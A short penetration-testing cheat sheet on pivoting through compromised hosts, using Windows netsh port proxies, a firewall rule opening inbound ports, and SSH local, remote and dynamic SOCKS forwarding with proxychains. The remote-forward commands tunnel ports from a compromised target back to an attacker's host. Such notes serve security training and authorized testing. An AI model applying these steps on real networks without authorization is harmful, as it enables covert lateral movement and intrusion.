Pivoting, Tunneling, & Port Forwarding

Netsh (Windows)

A native Windows command-line scripting utility that allows you to modify the network configuration of a computer.
#Add an IPv4-to-IPv4 port proxy that forwards connections from the listening address and port to the remote address and port
netsh interface portproxy add v4tov4 listenport=<port#> listenaddress=<current_IP> connectport=<remote_PORT> connectaddress=<remote_IP>

#Show forwarded port(s)
netsh interface portproxy show all

#Delete forwarded port(s)
netsh interface portproxy delete v4tov4 listenport=<port#> listenaddress=<IP_address>

#Update Windows firewall rules (if necessary) to allow inbound connections to the port being forwarded
netsh advfirewall firewall add rule name="forward_port_rule" protocol=TCP dir=in localip=<IP_address> localport=<local_port> action=allow

Secure Shell (SSH)

Local Port Forwarding

Tunnel a local port to a remote target through a compromised intermediary using SSH as the transfer protocol

#Establish local port forward to a remote host.
#Do not execute a remote command (-N) and specify a local port forward (-L)
ssh -N -L <local_bind_address>:<local_port>:<target_host>:<target_host_port> <username>@<intermediary_IP>

Remote Port Forwarding

Tunnel a remote port on a compromised target to our host

#SSH from compromised target to our host and establish remote port forward to our host
#Do not execute a remote command (-N) and specify a remote port forward (-R)
ssh -N -R <our_host_IPaddress>:<our_host_listener_port>:<compromised_target_interface>:<compromised_port_to_forward> <username>@<our_host_IPaddress>

#Interact with <our_host_listener_port> on our host machine

Dynamic Port Forwarding

Tunnel traffic arriving on a local listening port to remote destination(s)

#Establish a local dynamic SOCKS4 application-level port forward
ssh -N -D <bind_address>:<bind_port> <compromised_user>@<compromised_host>

#Run tools through the SOCKS4 proxy (e.g. with proxychains, after updating /etc/proxychains.conf)
proxychains <tool_to_run_through_portforward>
